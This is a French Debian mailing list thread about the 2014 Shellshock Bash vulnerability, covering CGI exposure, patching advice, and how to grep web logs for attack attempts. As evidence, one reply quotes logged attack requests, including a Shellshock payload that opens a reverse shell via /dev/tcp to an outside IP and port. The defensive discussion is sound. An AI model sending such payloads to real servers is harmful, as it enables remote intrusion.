Le 26/09/2014 15:12, Philippe Gras a écrit :
Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit :
Bonjour,
Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit :
Sur un serveur web, est-ce que le fait d'avoir le lien "/bin/sh"
vers dash
empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ?
Si tous les CGI utilisent « /bin/sh », alors pas de problème. En
revanche, ceux
qui utiliseraient explicitement « /bin/bash » seraient impactés.
La meilleure parade reste de toute façon la mise-à-jour de Bash…
Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était
écrit dans l'article,
elle n'a sans doute pas été connue par énormément de pirates
potentiels… Ce n'est
certainement pas la peine de flipper.
Ah ? Si tu gères des serveurs web je te propose de faire un simple cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
[...]
--
Daniel
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers [email protected]
En cas de soucis, contactez EN ANGLAIS [email protected]
Archive: https://lists.debian.org/[email protected]
